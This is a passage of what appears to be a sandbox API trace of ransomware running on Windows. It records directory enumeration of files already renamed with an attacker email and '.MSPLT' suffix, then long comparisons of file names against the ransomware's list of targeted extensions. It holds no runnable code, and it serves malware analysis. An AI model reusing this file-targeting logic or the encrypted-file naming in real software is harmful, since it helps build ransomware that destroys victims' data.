ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x2874, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="EULART~1.MSP")) returned 1 [0283.865] FindNextFileW (in: hFindFile=0x3947f68, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5b06769e, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5b06769e, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5b08d838, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x10b86, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="LOCALI~1.MSP")) returned 1 [0283.865] FindNextFileW (in: hFindFile=0x3947f68, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5b90bdb3, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5b90bdb3, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5ba2fb18, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x3e58, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="SETUPR~1.MSP")) returned 1 [0283.865] FindNextFileW (in: hFindFile=0x3947f68, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5b90bdb3, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5b90bdb3, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5ba2fb18, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x3e58, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="SETUPR~1.MSP")) returned 0 [0283.988] FindClose (in: hFindFile=0x3947f68 | out: hFindFile=0x3947f68) returned 1 [0283.989] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4014d58 | out: hHeap=0x470000) returned 1 [0283.989] FindNextFileW (in: hFindFile=0x48a8b0, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x5b420fb4, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5b420fb4, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="1042", cAlternateFileName="")) returned 1 [0283.989] lstrlenW (lpString="C:\\588bce7c90097ed212\\1042") returned 26 [0283.989] lstrcmpiW (lpString1="C:\\WINDOWS", lpString2="C:\\588bce7c90097ed212\\1042") returned 1 [0283.989] lstrlenW (lpString="1042") returned 4 [0283.989] lstrcmpiW (lpString1="C:\\WINDOWS", lpString2="1042") returned 1 [0283.989] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xfffe) returned 0x4014d58 [0283.989] lstrlenW (lpString="C:\\588bce7c90097ed212\\1042") returned 26 [0283.989] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1042\\*", lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x5b420fb4, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5b420fb4, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3947f28 [0283.990] FindNextFileW (in: hFindFile=0x3947f28, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x5b420fb4, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5b420fb4, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0283.991] FindNextFileW (in: hFindFile=0x3947f28, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5b06769e, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5b06769e, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5b3d4cb8, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x3274, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="EULART~1.MSP")) returned 1 [0284.002] lstrlenW (lpString="eula.rtf.id-B4197730.[supermetasploit@aol.com].MSPLT") returned 52 [0284.002] lstrlenW (lpString=".1cd") returned 4 [0284.002] lstrcmpiW (lpString1=".1cd", lpString2="SPLT") returned -1 [0284.002] lstrlenW (lpString=".3ds") returned 4 [0284.002] lstrcmpiW (lpString1=".3ds", lpString2="SPLT") returned -1 [0284.002] lstrlenW (lpString=".3fr") returned 4 [0284.002] lstrcmpiW (lpString1=".3fr", lpString2="SPLT") returned -1 [0284.002] lstrlenW (lpString=".3g2") returned 4 [0284.002] lstrcmpiW (lpString1=".3g2", lpString2="SPLT") returned -1 [0284.002] lstrlenW (lpString=".3gp") returned 4 [0284.002] lstrcmpiW (lpString1=".3gp", lpString2="SPLT") returned -1 [0284.002] lstrlenW (lpString=".7z") returned 3 [0284.002] lstrcmpiW (lpString1=".7z", lpString2="PLT") returned -1 [0284.002] lstrlenW (lpString=".accda") returned 6 [0284.002] lstrcmpiW (lpString1=".accda", lpString2=".MSPLT") returned -1 [0284.002] lstrlenW (lpString=".accdb") returned 6 [0284.002] lstrcmpiW (lpString1=".accdb", lpString2=".MSPLT") returned -1 [0284.002] lstrlenW (lpString=".accdc") returned 6 [0284.002] lstrcmpiW (lpString1=".accdc", lpString2=".MSPLT") returned -1 [0284.002] lstrlenW (lpString=".accde") returned 6 [0284.002] lstrcmpiW (lpString1=".accde", lpString2=".MSPLT") returned -1 [0284.003] lstrlenW (lpString=".accdt") returned 6 [0284.003] lstrcmpiW (lpString1=".accdt", lpString2=".MSPLT") returned -1 [0284.003] lstrlenW (lpString=".accdw") returned 6 [0284.003] lstrcmpiW (lpString1=".accdw", lpString2=".MSPLT") returned -1 [0284.003] lstrlenW (lpString=".adb") returned 4 [0284.003] lstrcmpiW (lpString1=".adb", lpString2="SPLT") returned -1 [0284.003] lstrlenW (lpString=".adp") returned 4 [0284.003] lstrcmpiW (lpString1=".adp", lpString2="SPLT") returned -1 [0284.003] lstrlenW (lpString=".ai") returned 3 [0284.003] lstrcmpiW (lpString1=".ai", lpString2="PLT") returned -1 [0284.003] lstrlenW (lpString=".ai3") returned 4 [0284.003] lstrcmpiW (lpString1=".ai3", lpString2="SPLT") returned -1 [0284.003] lstrlenW (lpString=".ai4") returned 4 [0284.003] lstrcmpiW (lpString1=".ai4", lpString2="SPLT") returned -1 [0284.003] lstrlenW (lpString=".ai5") returned 4 [0284.003] lstrcmpiW (lpString1=".ai5", lpString2="SPLT") returned -1 [0284.003] lstrlenW (lpString=".ai6") returned 4 [0284.003] lstrcmpiW (lpString1=".ai6", lpString2="SPLT") returned -1 [0284.003] lstrlenW (lpString=".ai7") returned 4 [0284.003] lstrcmpiW (lpString1=".ai7", lpString2="SPLT") returned -1 [0284.003] lstrlenW (lpString=".ai8") returned 4 [0284.003] lstrcmpiW (lpString1=".ai8", lpString2="SPLT") returned -1 [0284.003] lstrlenW (lpString=".anim") returned 5 [0284.003] lstrcmpiW (lpString1=".anim", lpString2="MSPLT") returned -1 [0284.003] lstrlenW (lpString=".arw") returned 4 [0284.003] lstrcmpiW (lpString1=".arw", lpString2="SPLT") returned -1 [0284.003] lstrlenW (lpString=".as") returned 3 [0284.003] lstrcmpiW (lpString1=".as", lpString2="PLT") returned -1 [0284.004] lstrlenW (lpString=".asa") returned 4 [0284.004] lstrcmpiW (lpString1=".asa", lpString2="SPLT") returned -1 [0284.004] lstrlenW (lpString=".asc") returned 4 [0284.004] lstrcmpiW (lpString1=".asc", lpString2="SPLT") returned -1 [0284.004] lstrlenW (lpString=".ascx") returned 5 [0284.004] lstrcmpiW (lpString1=".ascx", lpString2="MSPLT") returned -1 [0284.004] lstrlenW (lpString=".asm") returned 4 [0284.004] lstrcmpiW (lpString1=".asm", lpString2="SPLT") returned -1 [0284.004] lstrlenW (lpString=".asmx") returned 5 [0284.004] lstrcmpiW (lpString1=".asmx", lpString2="MSPLT") returned -1 [0284.004] lstrlenW (lpString=".asp") returned 4 [0284.004] lstrcmpiW (lpString1=".asp", lpString2="SPLT") returned -1 [0284.004] lstrlenW (lpString=".aspx") returned 5 [0284.004] lstrcmpiW (lpString1=".aspx", lpString2="MSPLT") returned -1 [0284.004] lstrlenW (lpString=".asr") returned 4 [0284.004] lstrcmpiW (lpString1=".asr", lpString2="SPLT") returned -1 [0284.004] lstrlenW (lpString=".asx") returned 4 [0284.004] lstrcmpiW (lpString1=".asx", lpString2="SPLT") returned -1 [0284.004] lstrlenW (lpString=".avi") returned 4 [0284.004] lstrcmpiW (lpString1=".avi", lpString2="SPLT") returned -1 [0284.004] lstrlenW (lpString=".avs") returned 4 [0284.004] lstrcmpiW (lpString1=".avs", lpString2="SPLT") returned -1 [0284.004] lstrlenW (lpString=".backup") returned 7 [0284.004] lstrcmpiW (lpString1=".backup", lpString2="].MSPLT") returned -1 [0284.004] lstrlenW (lpString=".bak") returned 4 [0284.004] lstrcmpiW (lpString1=".bak", lpString2="SPLT") returned -1 [0284.004] lstrlenW (lpString=".bay") returned 4 [0284.005] lstrcmpiW (lpString1=".bay", lpString2="SPLT") returned -1 [0284.005] lstrlenW (lpString=".bd") returned 3 [0284.005] lstrcmpiW (lpString1=".bd", lpString2="PLT") returned -1 [0284.005] lstrlenW (lpString=".bin") returned 4 [0284.005] lstrcmpiW (lpString1=".bin", lpString2="SPLT") returned -1 [0284.005] lstrlenW (lpString=".bmp") returned 4 [0284.005] lstrcmpiW (lpString1=".bmp", lpString2="SPLT") returned -1 [0284.005] lstrlenW (lpString=".bz2") returned 4 [0284.005] lstrcmpiW (lpString1=".bz2", lpString2="SPLT") returned -1 [0284.005] lstrlenW (lpString=".c") returned 2 [0284.005] lstrcmpiW (lpString1=".c", lpString2="LT") returned -1 [0284.005] lstrlenW (lpString=".cdr") returned 4 [0284.005] lstrcmpiW (lpString1=".cdr", lpString2="SPLT") returned -1 [0284.005] lstrlenW (lpString=".cer") returned 4 [0284.005] lstrcmpiW (lpString1=".cer", lpString2="SPLT") returned -1 [0284.005] lstrlenW (lpString=".cf") returned 3 [0284.005] lstrcmpiW (lpString1=".cf", lpString2="PLT") returned -1 [0284.005] lstrlenW (lpString=".cfc") returned 4 [0284.005] lstrcmpiW (lpString1=".cfc", lpString2="SPLT") returned -1 [0284.005] lstrlenW (lpString=".cfm") returned 4 [0284.005] lstrcmpiW (lpString1=".cfm", lpString2="SPLT") returned -1 [0284.005] lstrlenW (lpString=".cfml") returned 5 [0284.005] lstrcmpiW (lpString1=".cfml", lpString2="MSPLT") returned -1 [0284.006] lstrlenW (lpString=".cfu") returned 4 [0284.006] lstrcmpiW (lpString1=".cfu", lpString2="SPLT") returned -1 [0284.006] lstrlenW (lpString=".chm") returned 4 [0284.006] lstrcmpiW (lpString1=".chm", lpString2="SPLT") returned -1 [0284.006] lstrlenW (lpString=".cin") returned 4 [0284.006] lstrcmpiW (lpString1=".cin", lpString2="SPLT") returned -1 [0284.006] lstrlenW (lpString=".class") returned 6 [0284.006] lstrcmpiW (lpString1=".class", lpString2=".MSPLT") returned -1 [0284.006] lstrlenW (lpString=".clx") returned 4 [0284.006] lstrcmpiW (lpString1=".clx", lpString2="SPLT") returned -1 [0284.006] lstrlenW (lpString=".config") returned 7 [0284.006] lstrcmpiW (lpString1=".config", lpString2="].MSPLT") returned -1 [0284.006] lstrlenW (lpString=".cpp") returned 4 [0284.006] lstrcmpiW (lpString1=".cpp", lpString2="SPLT") returned -1 [0284.006] lstrlenW (lpString=".cr2") returned 4 [0284.006] lstrcmpiW (lpString1=".cr2", lpString2="SPLT") returned -1 [0284.006] lstrlenW (lpString=".crt") returned 4 [0284.006] lstrcmpiW (lpString1=".crt", lpString2="SPLT") returned -1 [0284.006] lstrlenW (lpString=".crw") returned 4 [0284.006] lstrcmpiW (lpString1=".crw", lpString2="SPLT") returned -1 [0284.006] lstrlenW (lpString=".cs") returned 3 [0284.006] lstrcmpiW (lpString1=".cs", lpString2="PLT") returned -1 [0284.006] lstrlenW (lpString=".css") returned 4 [0284.006] lstrcmpiW (lpString1=".css", lpString2="SPLT") returned -1 [0284.006] lstrlenW (lpString=".csv") returned 4 [0284.007] lstrcmpiW (lpString1=".csv", lpString2="SPLT") returned -1 [0284.007] lstrlenW (lpString=".cub") returned 4 [0284.007] lstrcmpiW (lpString1=".cub", lpString2="SPLT") returned -1 [0284.007] lstrlenW (lpString=".dae") returned 4 [0284.007] lstrcmpiW (lpString1=".dae", lpString2="SPLT") returned -1 [0284.007] lstrlenW (lpString=".dat") returned 4 [0284.007] lstrcmpiW (lpString1=".dat", lpString2="SPLT") returned -1 [0284.007] lstrlenW (lpString=".db") returned 3 [0284.007] lstrcmpiW (lpString1=".db", lpString2="PLT") returned -1 [0284.007] lstrlenW (lpString=".dbf") returned 4 [0284.007] lstrcmpiW (lpString1=".dbf", lpString2="SPLT") returned -1 [0284.007] lstrlenW (lpString=".dbx") returned 4 [0284.007] lstrcmpiW (lpString1=".dbx", lpString2="SPLT") returned -1 [0284.007] lstrlenW (lpString=".dc3") returned 4 [0284.007] lstrcmpiW (lpString1=".dc3", lpString2="SPLT") returned -1 [0284.007] lstrlenW (lpString=".dcm") returned 4 [0284.007] lstrcmpiW (lpString1=".dcm", lpString2="SPLT") returned -1 [0284.007] lstrlenW (lpString=".dcr") returned 4 [0284.007] lstrcmpiW (lpString1=".dcr", lpString2="SPLT") returned -1 [0284.007] lstrlenW (lpString=".der") returned 4 [0284.007] lstrcmpiW (lpString1=".der", lpString2="SPLT") returned -1 [0284.007] lstrlenW (lpString=".dib") returned 4 [0284.007] lstrcmpiW (lpString1=".dib", lpString2="SPLT") returned -1 [0284.007] lstrlenW (lpString=".dic") returned 4 [0284.008] lstrcmpiW (lpString1=".dic", lpString2="SPLT") returned -1 [0284.008] lstrlenW (lpString=".dif") returned 4 [0284.008] lstrcmpiW (lpString1=".dif", lpString2="SPLT") returned -1 [0284.008] lstrlenW (lpString=".divx") returned 5 [0284.008] lstrcmpiW (lpString1=".divx", lpString2="MSPLT") returned -1 [0284.008] lstrlenW (lpString=".djvu") returned 5 [0284.008] lstrcmpiW (lpString1=".djvu", lpString2="MSPLT") returned -1 [0284.008] lstrlenW (lpString=".dng") returned 4 [0284.008] lstrcmpiW (lpString1=".dng", lpString2="SPLT") returned -1 [0284.008] lstrlenW (lpString=".doc") returned 4 [0284.008] lstrcmpiW (lpString1=".doc", lpString2="SPLT") returned -1 [0284.008] lstrlenW (lpString=".docm") returned 5 [0284.008] lstrcmpiW (lpString1=".docm", lpString2="MSPLT") returned -1 [0284.008] lstrlenW (lpString=".docx") returned 5 [0284.008] lstrcmpiW (lpString1=".docx", lpString2="MSPLT") returned -1 [0284.008] lstrlenW (lpString=".dot") returned 4 [0284.008] lstrcmpiW (lpString1=".dot", lpString2="SPLT") returned -1 [0284.008] lstrlenW (lpString=".dotm") returned 5 [0284.008] lstrcmpiW (lpString1=".dotm", lpString2="MSPLT") returned -1 [0284.008] lstrlenW (lpString=".dotx") returned 5 [0284.008] lstrcmpiW (lpString1=".dotx", lpString2="MSPLT") returned -1 [0284.008] lstrlenW (lpString=".dpx") returned 4 [0284.008] lstrcmpiW (lpString1=".dpx", lpString2="SPLT") returned -1 [0284.008] lstrlenW (lpString=".dqy") returned 4 [0284.008] lstrcmpiW (lpString1=".dqy", lpString2="SPLT") returned -1 [0284.008] lstrlenW (lpString=".dsn") returned 4 [0284.008] lstrcmpiW (lpString1=".dsn", lpString2="SPLT") returned -1 [0284.009] lstrlenW (lpString=".dt") returned 3 [0284.009] lstrcmpiW (lpString1=".dt", lpString2="PLT") returned -1 [0284.009] lstrlenW (lpString=".dtd") returned 4 [0284.009] lstrcmpiW (lpString1=".dtd", lpString2="SPLT") returned -1 [0284.009] lstrlenW (lpString=".dwg") returned 4 [0284.009] lstrcmpiW (lpString1=".dwg", lpString2="SPLT") returned -1 [0284.009] lstrlenW (lpString=".dwt") returned 4 [0284.009] lstrcmpiW (lpString1=".dwt", lpString2="SPLT") returned -1 [0284.009] lstrlenW (lpString=".dx") returned 3 [0284.009] lstrcmpiW (lpString1=".dx", lpString2="PLT") returned -1 [0284.009] lstrlenW (lpString=".dxf") returned 4 [0284.009] lstrcmpiW (lpString1=".dxf", lpString2="SPLT") returned -1 [0284.009] lstrlenW (lpString=".edml") returned 5 [0284.009] lstrcmpiW (lpString1=".edml", lpString2="MSPLT") returned -1 [0284.009] lstrlenW (lpString=".efd") returned 4 [0284.009] lstrcmpiW (lpString1=".efd", lpString2="SPLT") returned -1 [0284.009] lstrlenW (lpString=".elf") returned 4 [0284.009] lstrcmpiW (lpString1=".elf", lpString2="SPLT") returned -1 [0284.009] lstrlenW (lpString=".emf") returned 4 [0284.009] lstrcmpiW (lpString1=".emf", lpString2="SPLT") returned -1 [0284.009] lstrlenW (lpString=".emz") returned 4 [0284.009] lstrcmpiW (lpString1=".emz", lpString2="SPLT") returned -1 [0284.009] lstrlenW (lpString=".epf") returned 4 [0284.009] lstrcmpiW (lpString1=".epf", lpString2="SPLT") returned -1 [0284.009] lstrlenW (lpString=".eps") returned 4 [0284.009] lstrcmpiW (lpString1=".eps", lpString2="SPLT") returned -1 [0284.009] lstrlenW (lpString=".epsf") returned 5 [0284.010] lstrcmpiW (lpString1=".epsf", lpString2="MSPLT") returned -1 [0284.010] lstrlenW (lpString=".epsp") returned 5 [0284.010] lstrcmpiW (lpString1=".epsp", lpString2="MSPLT") returned -1 [0284.010] lstrlenW (lpString=".erf") returned 4 [0284.010] lstrcmpiW (lpString1=".erf", lpString2="SPLT") returned -1 [0284.010] lstrlenW (lpString=".exr") returned 4 [0284.010] lstrcmpiW (lpString1=".exr", lpString2="SPLT") returned -1 [0284.010] lstrlenW (lpString=".f4v") returned 4 [0284.010] lstrcmpiW (lpString1=".f4v", lpString2="SPLT") returned -1 [0284.010] lstrlenW (lpString=".fido") returned 5 [0284.010] lstrcmpiW (lpString1=".fido", lpString2="MSPLT") returned -1 [0284.010] lstrlenW (lpString=".flm") returned 4 [0284.010] lstrcmpiW (lpString1=".flm", lpString2="SPLT") returned -1 [0284.010] lstrlenW (lpString=".flv") returned 4 [0284.010] lstrcmpiW (lpString1=".flv", lpString2="SPLT") returned -1 [0284.010] lstrlenW (lpString=".frm") returned 4 [0284.010] lstrcmpiW (lpString1=".frm", lpString2="SPLT") returned -1 [0284.010] lstrlenW (lpString=".fxg") returned 4 [0284.010] lstrcmpiW (lpString1=".fxg", lpString2="SPLT") returned -1 [0284.010] lstrlenW (lpString=".geo") returned 4 [0284.010] lstrcmpiW (lpString1=".geo", lpString2="SPLT") returned -1 [0284.010] lstrlenW (lpString=".gif") returned 4 [0284.010] lstrcmpiW (lpString1=".gif", lpString2="SPLT") returned -1 [0284.010] lstrlenW (lpString=".grs") returned 4 [0284.011] lstrcmpiW (lpString1=".grs", lpString2="SPLT") returned -1 [0284.011] lstrlenW (lpString=".gz") returned 3 [0284.011] lstrcmpiW (lpString1=".gz", lpString2="PLT") returned -1 [0284.011] lstrlenW (lpString=".h") returned 2 [0284.011] lstrcmpiW (lpString1=".h", lpString2="LT") returned -1 [0284.011] lstrlenW (lpString=".hdr") returned 4 [0284.011] lstrcmpiW (lpString1=".hdr", lpString2="SPLT") returned -1 [0284.011] lstrlenW (lpString=".hpp") returned 4 [0284.011] lstrcmpiW (lpString1=".hpp", lpString2="SPLT") returned -1 [0284.011] lstrlenW (lpString=".hta") returned 4 [0284.011] lstrcmpiW (lpString1=".hta", lpString2="SPLT") returned -1 [0284.011] lstrlenW (lpString=".htc") returned 4 [0284.011] lstrcmpiW (lpString1=".htc", lpString2="SPLT") returned -1 [0284.011] lstrlenW (lpString=".htm") returned 4 [0284.011] lstrcmpiW (lpString1=".htm", lpString2="SPLT") returned -1 [0284.011] lstrlenW (lpString=".html") returned 5 [0284.011] lstrcmpiW (lpString1=".html", lpString2="MSPLT") returned -1 [0284.011] lstrlenW (lpString=".icb") returned 4 [0284.011] lstrcmpiW (lpString1=".icb", lpString2="SPLT") returned -1 [0284.011] lstrlenW (lpString=".ics") returned 4 [0284.011] lstrcmpiW (lpString1=".ics", lpString2="SPLT") returned -1 [0284.011] lstrlenW (lpString=".iff") returned 4 [0284.011] lstrcmpiW (lpString1=".iff", lpString2="SPLT") returned -1 [0284.011] lstrlenW (lpString=".inc") returned 4 [0284.011] lstrcmpiW (lpString1=".inc", lpString2="SPLT") returned -1 [0284.011] lstrlenW (lpString=".indd") returned 5 [0284.011] lstrcmpiW (lpString1=".indd", lpString2="MSPLT") returned -1 [0284.011] lstrlenW (lpString=".ini") returned 4 [0284.012] lstrcmpiW (lpString1=".ini", lpString2="SPLT") returned -1 [0284.012] lstrlenW (lpString=".iqy") returned 4 [0284.012] lstrcmpiW (lpString1=".iqy", lpString2="SPLT") returned -1 [0284.012] lstrlenW (lpString=".j2c") returned 4 [0284.012] lstrcmpiW (lpString1=".j2c", lpString2="SPLT") returned -1 [0284.012] lstrlenW (lpString=".j2k") returned 4 [0284.012] lstrcmpiW (lpString1=".j2k", lpString2="SPLT") returned -1 [0284.012] lstrlenW (lpString=".java") returned 5 [0284.012] lstrcmpiW (lpString1=".java", lpString2="MSPLT") returned -1 [0284.012] lstrlenW (lpString=".jp2") returned 4 [0284.012] lstrcmpiW (lpString1=".jp2", lpString2="SPLT") returned -1 [0284.012] lstrlenW (lpString=".jpc") returned 4 [0284.012] lstrcmpiW (lpString1=".jpc", lpString2="SPLT") returned -1 [0284.012] lstrlenW (lpString=".jpe") returned 4 [0284.012] lstrcmpiW (lpString1=".jpe", lpString2="SPLT") returned -1 [0284.012] lstrlenW (lpString=".jpeg") returned 5 [0284.012] lstrcmpiW (lpString1=".jpeg", lpString2="MSPLT") returned -1 [0284.012] lstrlenW (lpString=".jpf") returned 4 [0284.012] lstrcmpiW (lpString1=".jpf", lpString2="SPLT") returned -1 [0284.012] lstrlenW (lpString=".jpg") returned 4 [0284.012] lstrcmpiW (lpString1=".jpg", lpString2="SPLT") returned -1 [0284.012] lstrlenW (lpString=".jpx") returned 4 [0284.012] lstrcmpiW (lpString1=".jpx", lpString2="SPLT") returned -1 [0284.012] lstrlenW (lpString=".js") returned 3 [0284.012] lstrcmpiW (lpString1=".js", lpString2="PLT") returned -1 [0284.012] lstrlenW (lpString=".jsf") returned 4 [0284.012] lstrcmpiW (lpString1=".jsf", lpString2="SPLT") returned -1 [0284.012] lstrlenW (lpString=".json") returned 5 [0284.012] lstrcmpiW (lpString1=".json", lpString2="MSPLT") returned -1 [0284.013] lstrlenW (lpString=".jsp") returned 4 [0284.013] lstrcmpiW (lpString1=".jsp", lpString2="SPLT") returned -1 [0284.013] lstrlenW (lpString=".kdc") returned 4 [0284.013] lstrcmpiW (lpString1=".kdc", lpString2="SPLT") returned -1 [0284.013] lstrlenW (lpString=".kmz") returned 4 [0284.013] lstrcmpiW (lpString1=".kmz", lpString2="SPLT") returned -1 [0284.013] lstrlenW (lpString=".kwm") returned 4 [0284.013] lstrcmpiW (lpString1=".kwm", lpString2="SPLT") returned -1 [0284.013] lstrlenW (lpString=".lasso") returned 6 [0284.013] lstrcmpiW (lpString1=".lasso", lpString2=".MSPLT") returned -1 [0284.013] lstrlenW (lpString=".lbi") returned 4 [0284.013] lstrcmpiW (lpString1=".lbi", lpString2="SPLT") returned -1 [0284.013] lstrlenW (lpString=".lgf") returned 4 [0284.013] lstrcmpiW (lpString1=".lgf", lpString2="SPLT") returned -1 [0284.013] lstrlenW (lpString=".lgp") returned 4 [0284.013] lstrcmpiW (lpString1=".lgp", lpString2="SPLT") returned -1 [0284.013] lstrlenW (lpString=".log") returned 4 [0284.013] lstrcmpiW (lpString1=".log", lpString2="SPLT") returned -1 [0284.013] lstrlenW (lpString=".m1v") returned 4 [0284.013] lstrcmpiW (lpString1=".m1v", lpString2="SPLT") returned -1 [0284.013] lstrlenW (lpString=".m4a") returned 4 [0284.013] lstrcmpiW (lpString1=".m4a", lpString2="SPLT") returned -1 [0284.013] lstrlenW (lpString=".m4v") returned 4 [0284.013] lstrcmpiW (lpString1=".m4v", lpString2="SPLT") returned -1 [0284.013] lstrlenW (lpString=".max") returned 4 [0284.013] lstrcmpiW (lpString1=".max", lpString2="SPLT") returned -1 [0284.013] lstrlenW (lpString=".md") returned 3 [0284.014] lstrcmpiW (lpString1=".md", lpString2="PLT") returned -1 [0284.014] lstrlenW (lpString=".mda") returned 4 [0284.014] lstrcmpiW (lpString1=".mda", lpString2="SPLT") returned -1 [0284.014] lstrlenW (lpString=".mdb") returned 4 [0284.014] lstrcmpiW (lpString1=".mdb", lpString2="SPLT") returned -1 [0284.014] lstrlenW (lpString=".mde") returned 4 [0284.014] lstrcmpiW (lpString1=".mde", lpString2="SPLT") returned -1 [0284.014] lstrlenW (lpString=".mdf") returned 4 [0284.014] lstrcmpiW (lpString1=".mdf", lpString2="SPLT") returned -1 [0284.014] lstrlenW (lpString=".mdw") returned 4 [0284.014] lstrcmpiW (lpString1=".mdw", lpString2="SPLT") returned -1 [0284.014] lstrlenW (lpString=".mef") returned 4 [0284.014] lstrcmpiW (lpString1=".mef", lpString2="SPLT") returned -1 [0284.014] lstrlenW (lpString=".mft") returned 4 [0284.014] lstrcmpiW (lpString1=".mft", lpString2="SPLT") returned -1 [0284.014] lstrlenW (lpString=".mfw") returned 4 [0284.014] lstrcmpiW (lpString1=".mfw", lpString2="SPLT") returned -1 [0284.014] lstrlenW (lpString=".mht") returned 4 [0284.014] lstrcmpiW (lpString1=".mht", lpString2="SPLT") returned -1 [0284.014] lstrlenW (lpString=".mhtml") returned 6 [0284.014] lstrcmpiW (lpString1=".mhtml", lpString2=".MSPLT") returned -1 [0284.014] lstrlenW (lpString=".mka") returned 4 [0284.014] lstrcmpiW (lpString1=".mka", lpString2="SPLT") returned -1 [0284.014] lstrlenW (lpString=".mkidx") returned 6 [0284.014] lstrcmpiW (lpString1=".mkidx", lpString2=".MSPLT") returned -1 [0284.014] lstrlenW (lpString=".mkv") returned 4 [0284.014] lstrcmpiW (lpString1=".mkv", lpString2="SPLT") returned -1 [0284.015] lstrlenW (lpString=".mos") returned 4 [0284.015] lstrcmpiW (lpString1=".mos", lpString2="SPLT") returned -1 [0284.015] lstrlenW (lpString=".mov") returned 4 [0284.015] lstrcmpiW (lpString1=".mov", lpString2="SPLT") returned -1 [0284.015] lstrlenW (lpString=".mp3") returned 4 [0284.015] lstrcmpiW (lpString1=".mp3", lpString2="SPLT") returned -1 [0284.015] lstrlenW (lpString=".mp4") returned 4 [0284.015] lstrcmpiW (lpString1=".mp4", lpString2="SPLT") returned -1 [0284.015] lstrlenW (lpString=".mpeg") returned 5 [0284.015] lstrcmpiW (lpString1=".mpeg", lpString2="MSPLT") returned -1 [0284.015] lstrlenW (lpString=".mpg") returned 4 [0284.015] lstrcmpiW (lpString1=".mpg", lpString2="SPLT") returned -1 [0284.015] lstrlenW (lpString=".mpv") returned 4 [0284.015] lstrcmpiW (lpString1=".mpv", lpString2="SPLT") returned -1 [0284.015] lstrlenW (lpString=".mrw") returned 4 [0284.015] lstrcmpiW (lpString1=".mrw", lpString2="SPLT") returned -1 [0284.015] lstrlenW (lpString=".msg") returned 4 [0284.015] lstrcmpiW (lpString1=".msg", lpString2="SPLT") returned -1 [0284.015] lstrlenW (lpString=".mxl") returned 4 [0284.015] lstrcmpiW (lpString1=".mxl", lpString2="SPLT") returned -1 [0284.015] lstrlenW (lpString=".myd") returned 4 [0284.015] lstrcmpiW (lpString1=".myd", lpString2="SPLT") returned -1 [0284.015] lstrlenW (lpString=".myi") returned 4 [0284.015] lstrcmpiW (lpString1=".myi", lpString2="SPLT") returned -1 [0284.015] lstrlenW (lpString=".nef") returned 4 [0284.015] lstrcmpiW (lpString1=".nef", lpString2="SPLT") returned -1 [0284.015] lstrlenW (lpString=".nrw") returned 4 [0284.015] lstrcmpiW (lpString1=".nrw", lpString2="SPLT") returned -1 [0284.016] lstrlenW (lpString=".obj") returned 4 [0284.016] 